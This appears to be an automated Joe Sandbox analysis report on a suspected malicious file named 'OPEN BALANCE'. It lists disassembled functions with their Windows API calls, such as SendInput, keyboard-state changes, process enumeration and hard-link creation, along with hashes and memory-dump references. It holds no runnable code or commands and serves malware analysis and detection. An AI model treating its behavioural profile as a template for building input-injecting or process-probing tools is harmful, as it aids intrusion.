Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: e0f063a4bc7f51146e5000f83f95145a1b3d01ce5ab78b51099996bcb39e6c7d
Instruction ID: 4ba85ded34726de86136c6f729d647d3778ca4f62a929e42c1b2f15c898da5be
Opcode Fuzzy Hash: e0f063a4bc7f51146e5000f83f95145a1b3d01ce5ab78b51099996bcb39e6c7d
Instruction Fuzzy Hash: CD21B072610119BBEF119F54DC45FAB376AFF89754F108225F900AB290CA71DC5197A1

Function 008B49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 008B4A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 008B4A5C
SetErrorMode.KERNEL32(00000000,?,?,008DCC08), ref: 008B4AD0

Strings

%lu, xrefs: 008B4A6F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: f084ef942e51e27b0abef384d8c98285b20babdefb24ff3da547951dd63111c4
Instruction ID: 41b9b3968ff91289175b8d27714a09fb2df91f5a4e822199a33fe44de6bf69c3
Opcode Fuzzy Hash: f084ef942e51e27b0abef384d8c98285b20babdefb24ff3da547951dd63111c4
Instruction Fuzzy Hash: 83313075A00119AFDB10DF58C985EAA77F8FF04308F1440A5E905DB352D771ED45CB61

Function 008D41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008D424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008D4264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 008D4271

Strings

msctls_trackbar32, xrefs: 008D4226

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 5cece56a4c7716973e3be5f36052d5106979e58ca9293ff3f5313e7009c53ecb
Instruction ID: c4f5b973d0b89f8393f9325d07f476205f3fe74dfb5e653b221e2cbd2f3f256e
Opcode Fuzzy Hash: 5cece56a4c7716973e3be5f36052d5106979e58ca9293ff3f5313e7009c53ecb
Instruction Fuzzy Hash: 7F11E031240208BFEF205E68CC06FAB3BACFF95B64F110225FA55E21A0D671D8619B20

Function 008A2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00846B57: _wcslen.LIBCMT ref: 00846B6A

Part of subcall function 008A2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 008A2DC5
Part of subcall function 008A2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 008A2DD6
Part of subcall function 008A2DA7: GetCurrentThreadId.KERNEL32 ref: 008A2DDD
Part of subcall function 008A2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 008A2DE4

GetFocus.USER32 ref: 008A2F78

Part of subcall function 008A2DEE: GetParent.USER32(00000000), ref: 008A2DF9

GetClassNameW.USER32(?,?,00000100), ref: 008A2FC3
EnumChildWindows.USER32(?,008A303B), ref: 008A2FEB

Strings

%s%d, xrefs: 008A2FFF

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 435b04244255ecedbf238563476701f877f851ded4b15b1a291a4e24d2186d71
Instruction ID: 757dff32f3d17916479deda644e35c4e211c79843d7e85abcc6cb2ef642c659f
Opcode Fuzzy Hash: 435b04244255ecedbf238563476701f877f851ded4b15b1a291a4e24d2186d71
Instruction Fuzzy Hash: 7711A5716002096BDF147F689C85EEE776AFF95314F044075FD09DB292EE309945CB61

Function 008D5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008D58C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008D58EE
DrawMenuBar.USER32(?), ref: 008D58FD

Strings

0, xrefs: 008D588F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 30fa836ddfa311152a6699ad5027478fe94083efb4fc8161e029da3c7faa124d
Instruction ID: 44abfbaa874ee88946a3fa55c4aa2b40be48820a09b4802b187bec8f4a868363
Opcode Fuzzy Hash: 30fa836ddfa311152a6699ad5027478fe94083efb4fc8161e029da3c7faa124d
Instruction Fuzzy Hash: 3D015B31500218EEDB219F15EC45FAEBBB9FB45361F10819BE949DA251DB308A84DF21

Function 008A007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 390949112028b52ada917c3126e759b3ce240e6b9bb2a79ca3d3bd9aa591c9f4
Instruction ID: b335621a77aa13045b61a4e28e06b6c538567388c538623e875bf855da43df9b
Opcode Fuzzy Hash: 390949112028b52ada917c3126e759b3ce240e6b9bb2a79ca3d3bd9aa591c9f4
Instruction Fuzzy Hash: B7C13875A0020AAFEB15CFA8C894BAEB7B5FF49704F208598E505EB251D771EE41CF90

Function 00881391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008814C0

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 282fc964090afccc19498a1c260b48f1dbe8d29d9b84f9db23e57a37ec37b739
Instruction ID: 4431e2261aea08352f424192b52b445669d0347592baa32c32f61c8be6bf5f12
Opcode Fuzzy Hash: 282fc964090afccc19498a1c260b48f1dbe8d29d9b84f9db23e57a37ec37b739
Instruction Fuzzy Hash: 26413631A00104ABDF217BBC9C89AAE3BAEFF41330F144225F519D6292EE7488425767

Function 008D6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0150ECA8,?), ref: 008D62E2
ScreenToClient.USER32(?,?), ref: 008D6315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 008D6382

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 4fdccacb6aa544535bb45505113c884fde01671ccd05057db36d5c7fafb843a4
Instruction ID: 20405bc296ecad2c8d77da915bcd64e84c59442290180254ee9e8689e000513b
Opcode Fuzzy Hash: 4fdccacb6aa544535bb45505113c884fde01671ccd05057db36d5c7fafb843a4
Instruction Fuzzy Hash: DD511A74A00209AFCB14DF68D8809AE7BB6FB55364F10826AF925DB390E770ED51CB90

Function 0087B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e423a05755f770dd7a0fecc6e58e0d7df84b618513bef879edd87dd1defbb04f
Instruction ID: 446e11560afa2f1d55fc85014417df96e22f55e59bc93a666fdaa61477b5ee0c
Opcode Fuzzy Hash: e423a05755f770dd7a0fecc6e58e0d7df84b618513bef879edd87dd1defbb04f
Instruction Fuzzy Hash: 25410671A00304AFD724AF7CCC45B6ABBFAFB88710F10852AF559DB296D771D9018781

Function 008B56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008B5783
GetLastError.KERNEL32(?,00000000), ref: 008B57A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008B57CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008B57FA

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: dd7765ab32b0459311f42fefa77cdfa55b9cd381a8064bebf5511d3c1fd78d2b
Instruction ID: 3658e83e46cad2fc518b9f56e4e792865015fa923d16abcff7287a5bbd5c3f7c
Opcode Fuzzy Hash: dd7765ab32b0459311f42fefa77cdfa55b9cd381a8064bebf5511d3c1fd78d2b
Instruction Fuzzy Hash: 83411E35600615DFCB11EF19C544A5EBBE1FF49320B198898E84A9F362CB35FD40CB92

Function 0087D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00866D71,00000000,00000000,008682D9,?,008682D9,?,00000001,00866D71,8BE85006,00000001,008682D9,008682D9), ref: 0087D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0087D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0087D9AB
__freea.LIBCMT ref: 0087D9B4

Part of subcall function 00873820: RtlAllocateHeap.NTDLL(00000000,?,00911444), ref: 00873852

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 52f0c71e94abd6f1d4a25a99a19159122f2cf391c25e3070b3585f3b58921c64
Instruction ID: 3d462e51507f135f9191eaab323699d681328d38cc641d3f0776513bc7a1cf7f
Opcode Fuzzy Hash: 52f0c71e94abd6f1d4a25a99a19159122f2cf391c25e3070b3585f3b58921c64
Instruction Fuzzy Hash: E131CD72A0021AABDF249F69DC41EAE7BB5FF40314B058268FD08DA254EB35CD50CB91

Function 008D52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 008D5352
GetWindowLongW.USER32(?,000000F0), ref: 008D5375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 008D5382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008D53A8

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: dcaa77c2827ec51f6bbe494a5dea5a888655d19c360ed58804af5285d7a21566
Instruction ID: f91c0f287e1627273c8150c899d4b038e4959a4c608619fa42b0c6308691cb97
Opcode Fuzzy Hash: dcaa77c2827ec51f6bbe494a5dea5a888655d19c360ed58804af5285d7a21566
Instruction Fuzzy Hash: 2E31A234A95A0CEFEB389A14CC55BE97765FB06390F584307FA11D63E1C7B09950EB42

Function 008AAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 008AABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 008AAC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 008AAC74
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 008AACC6

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: db98155b75fc6e5fe2487947fa9292371cf4b178109fa64100f914482776cdc3
Instruction ID: 02073510e1c536c35c817508412b23591d7643cead98cb6e62f3704d41319b7e
Opcode Fuzzy Hash: db98155b75fc6e5fe2487947fa9292371cf4b178109fa64100f914482776cdc3
Instruction Fuzzy Hash: EE31F630A44618AFFF298B65C8087FA7BA6FB86330F04431AE485D2DD1D3758985D752

Function 008D7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 008D769A
GetWindowRect.USER32(?,?), ref: 008D7710
PtInRect.USER32(?,?,008D8B89), ref: 008D7720
MessageBeep.USER32(00000000), ref: 008D778C

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 943fa9fa53a42fdb7f1f3f56a619c3ca7d0ead4176256ea2f5b47926952b32e9
Instruction ID: 7ebb48dfec8fc6ab038c72485dc46b9b5b90ba95a3380a814b04fc44e14a4654
Opcode Fuzzy Hash: 943fa9fa53a42fdb7f1f3f56a619c3ca7d0ead4176256ea2f5b47926952b32e9
Instruction Fuzzy Hash: 4E419A38A09255AFDB01CF58D894EA9B7F4FB48314F1486AAE925DB361E330E941CB90

Function 008D16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 008D16EB

Part of subcall function 008A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 008A3A57
Part of subcall function 008A3A3D: GetCurrentThreadId.KERNEL32 ref: 008A3A5E
Part of subcall function 008A3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008A25B3), ref: 008A3A65

GetCaretPos.USER32(?), ref: 008D16FF
ClientToScreen.USER32(00000000,?), ref: 008D174C
GetForegroundWindow.USER32 ref: 008D1752

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 74a8986954a166efcf0b06c1d311a6203ba62228549a7ba6acd6a1f8cab522de
Instruction ID: 42e940789f37126620f4837231a355c49ebf81eaf708678e3309d8db22738504
Opcode Fuzzy Hash: 74a8986954a166efcf0b06c1d311a6203ba62228549a7ba6acd6a1f8cab522de
Instruction Fuzzy Hash: 4D313075D01249AFDB00EFA9C885CAEB7FDFF49304B5080AAE415E7211EB359E45CBA1

Function 008AD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 008AD501
Process32FirstW.KERNEL32(00000000,?), ref: 008AD50F
Process32NextW.KERNEL32(00000000,?), ref: 008AD52F
CloseHandle.KERNEL32(00000000), ref: 008AD5DC

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 7ec6c594745b655e1af965d2d17d0d2946b395d38598f27d7c26a62fe521a8df
Instruction ID: e4e7abb3568d7aa549c7d9dd57e9710d8da77d3ed282d0196bf79d1c0ef356b2
Opcode Fuzzy Hash: 7ec6c594745b655e1af965d2d17d0d2946b395d38598f27d7c26a62fe521a8df
Instruction Fuzzy Hash: 0F31A1311083059FD304EF58C881AAFBBE8FF99344F10052DF582C65A2EB719945CB93

Function 008AD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,008DCB68), ref: 008AD2FB
GetLastError.KERNEL32 ref: 008AD30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 008AD319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,008DCB68), ref: 008AD376

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 16d531f1b59ae74a97dd5850c02dbfc7188347b1ce7433a8c8c23b73aa1311e8
Instruction ID: 70fc7b7f4d99ffcdf3700f023f3550dfa6baffd0b52607b1b2e655ac3b0fb77e
